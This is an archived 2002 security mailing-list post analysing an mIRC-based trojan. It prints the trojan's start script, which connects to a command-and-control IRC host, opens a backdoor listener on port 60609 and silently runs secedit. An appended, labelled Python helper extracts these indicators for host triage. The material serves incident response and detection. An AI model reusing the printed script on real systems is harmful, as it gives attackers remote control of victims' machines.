In-Reply-To: <F1E50062AEB5D411971E002035710A7304C3F950@MSXDENUSR01>

One of the Microsoft PSS Security Specialists contacted me after reading my analysis. I gave them a copy of the virus/trojan/malware I analyzed, and I also expressed my concern about their analysis. I did not hear back from them yesterday, but maybe we should give them a couple of days. However, I still want to make sure everyone that was infected runs Anti-Trojan software to remove any trojan and hacker tools. It's detailed in my analysis:

http://groups.google.com/groups?dq=&start=25&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

I did point out that there was a file called "ncp.exe", which in fact was NetCat, one of hackers' favorite tools, which could possibly allow a hacker to remote control the victims' systems... The other one, mt.exe, could be a DDoS agent (not confirmed). MS is aware of these situations. Let's make sure all the victims out there are at least recovering their systems properly!

Also, secedit.bat did NOT change the security policies. "DLL32NT.HLP" was the actual text (mIRC script) file that caused the problems...
Here is the actual script that got run (one mIRC command per line; on the original single line the commands were separated by "|"):

+++++++++++++
on *:start:{
  if ($exists(mdm.exe) == $false) { exit }
  //run mdm.exe /n /fh
  //set %server DEM0N.daemon.sh
  //set %timeout 10
  if ($portfree(60609) == $false) { exit }
  if ($portfree(60609) == $true) { /socklisten blah 60609 }
  //nick $read mdm.scr $+ $r(1,9)
  //timerc 1 4 //server %server $+ : $+ 6667
  //run mdm.exe /n /fh
  //remini NT32.ini ident userid
  //remini NT32.ini mirc user
  //remini NT32.ini mirc email
  //writeini NT32.ini ident userid $read mdm.scr
  //writeini NT32.ini mirc user $randomgen($r(0,9))
  //writeini NT32.ini mirc email $randomgen($r(0,9))
  //identd on $r(a,z) $+ $read mdm.scr $+ $r (a,z)
  //timercoolconnect -o 0 100 //server %server 6667
  //timer 1 1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet
  fos
}
+++++++++++++

As I looked in further, the "designer" of this trojan/malware used "UPX Executable Packer" from http://upx.sourceforge.net to compact taskmngr.exe (really a mIRC 5.70 client), so it reduced the file size from 1.3M to 442K. It also compacted it so well that there are very few ASCII characters to read in a hex editor. Once you use UPX to decompress it, you can read a lot more. I am still trying to see if anything was modified. Please let me know if anyone finds anything out there. I am not sure if the mIRC client has been modified...

The above script also opened a backdoor port 60609... If you have more info, please pass along.

Regards,

Kyle Lai, CISSP, CISA
Kyle Lai Consulting
aladin168at_private

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
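Added example, not part of the original post or of any Microsoft or SecurityFocus tooling: a small Python triage helper that pulls the indicators out of the quoted mIRC start script (the C2 hostname set with //set %server, the IRC port, the /socklisten backdoor port, and the files the script checks, reads, writes or passes to secedit), then matches them, together with the file names the post itself lists (ncp.exe, mt.exe, DLL32NT.HLP, taskmngr.exe, secedit.bat), against a host inventory. The host file list, listening-port set and PE section names below are constructed sample data, and the UPX check simply looks for the UPX0/UPX1 section names that the packer writes into the PE header.

```python
import ntpath
import re
from dataclasses import dataclass, field

# The on-start script quoted in the post, as one mIRC line (commands
# separated by "|"), used here as the parser's input.
MIRC_SCRIPT = (
    "on *:start:{ if ($exists(mdm.exe) == $false) { exit } | //run mdm.exe /n /fh | "
    "//set %server DEM0N.daemon.sh | //set %timeout 10 | "
    "if ($portfree(60609) == $false) { exit } | "
    "if ($portfree(60609) == $true) { /socklisten blah 60609 } | "
    "//nick $read mdm.scr $+ $r(1,9) | //timerc 1 4 //server %server $+ : $+ 6667 | "
    "//run mdm.exe /n /fh | //remini NT32.ini ident userid | //remini NT32.ini mirc user | "
    "//remini NT32.ini mirc email | //writeini NT32.ini ident userid $read mdm.scr | "
    "//writeini NT32.ini mirc user $randomgen($r(0,9)) | "
    "//writeini NT32.ini mirc email $randomgen($r(0,9)) | "
    "//identd on $r(a,z) $+ $read mdm.scr $+ $r (a,z) | "
    "//timercoolconnect -o 0 100 //server %server 6667 | "
    "//timer 1 1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet | fos }"
)

# File names the post mentions that the script itself never references.
FILES_NAMED_IN_POST = {"ncp.exe", "mt.exe", "DLL32NT.HLP", "taskmngr.exe", "secedit.bat"}


@dataclass
class Indicators:
    servers: set = field(default_factory=set)       # IRC/C2 hostnames from //set %server
    irc_ports: set = field(default_factory=set)     # outbound ports from //server
    listen_ports: set = field(default_factory=set)  # backdoor ports from /socklisten
    files: set = field(default_factory=set)         # files checked, read, written or fed to secedit
    executables: set = field(default_factory=set)   # programs launched with //run


def extract_indicators(script: str) -> Indicators:
    """Walk the script one mIRC command at a time and collect indicators."""
    ind = Indicators()
    for cmd in script.split("|"):
        cmd = cmd.strip()
        m = re.search(r"//set %server (\S+)", cmd)
        if m:
            ind.servers.add(m.group(1))
        # "//server %server $+ : $+ 6667" and "//server %server 6667" both end in the port.
        m = re.search(r"//server\b.*?(\d+)\s*$", cmd)
        if m:
            ind.irc_ports.add(int(m.group(1)))
        for m in re.finditer(r"/socklisten \S+ (\d+)", cmd):
            ind.listen_ports.add(int(m.group(1)))
        for m in re.finditer(r"\$exists\(([^)]+)\)", cmd):
            ind.files.add(m.group(1))
        for m in re.finditer(r"\$read (\S+)", cmd):
            ind.files.add(m.group(1))
        for m in re.finditer(r"//(?:remini|writeini) (\S+)", cmd):
            ind.files.add(m.group(1))
        # secedit's database and the template it is told to apply.
        for m in re.finditer(r"/(?:DB|cfg) (?:\$mircdir \$\+ )?(\S+)", cmd):
            ind.files.add(m.group(1))
        for m in re.finditer(r"//run (?:-n )?(\S+)", cmd):
            ind.executables.add(m.group(1))
    return ind


def triage(ind: Indicators, host_files, host_listeners):
    """Match dropped-file names and the backdoor port against a host inventory.

    Only file indicators are matched; 'secedit' is a legitimate Windows tool
    and its presence proves nothing.
    """
    wanted = {f.lower() for f in ind.files | FILES_NAMED_IN_POST}
    present = sorted({ntpath.basename(p) for p in host_files
                      if ntpath.basename(p).lower() in wanted})
    listeners = sorted(p for p in ind.listen_ports if p in host_listeners)
    return {"files": present, "listeners": listeners}


def looks_upx_packed(section_names) -> bool:
    """UPX names its sections UPX0/UPX1 (UPX2 on some versions) unless renamed."""
    return any(n.upper().startswith("UPX") for n in section_names)


# Constructed inventory of a suspect host; not data from any real system.
HOST_FILES = [
    r"C:\WINNT\system32\taskmngr.exe",
    r"C:\WINNT\system32\mdm.exe",
    r"C:\WINNT\system32\NT32.ini",
    r"C:\WINNT\system32\ncp.exe",
    r"C:\WINNT\notepad.exe",
]
HOST_LISTENERS = {135, 139, 445, 60609}
SECTIONS_OF_TASKMNGR = ["UPX0", "UPX1", ".rsrc"]  # constructed PE section list

if __name__ == "__main__":
    ind = extract_indicators(MIRC_SCRIPT)
    print("servers:", ind.servers, "irc ports:", ind.irc_ports, "listeners:", ind.listen_ports)
    print("triage:", triage(ind, HOST_FILES, HOST_LISTENERS))
    print("taskmngr.exe UPX-packed:", looks_upx_packed(SECTIONS_OF_TASKMNGR))
```

On a real host the inventory would come from a directory listing of the mIRC directory and from netstat output; a hit on tcp/60609 together with any of the dropped files is the signal that the machine still needs the clean-up the post asks for.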
This archive was generated by hypermail 2b30 : Wed Sep 11 2002 - 15:30:22 PDT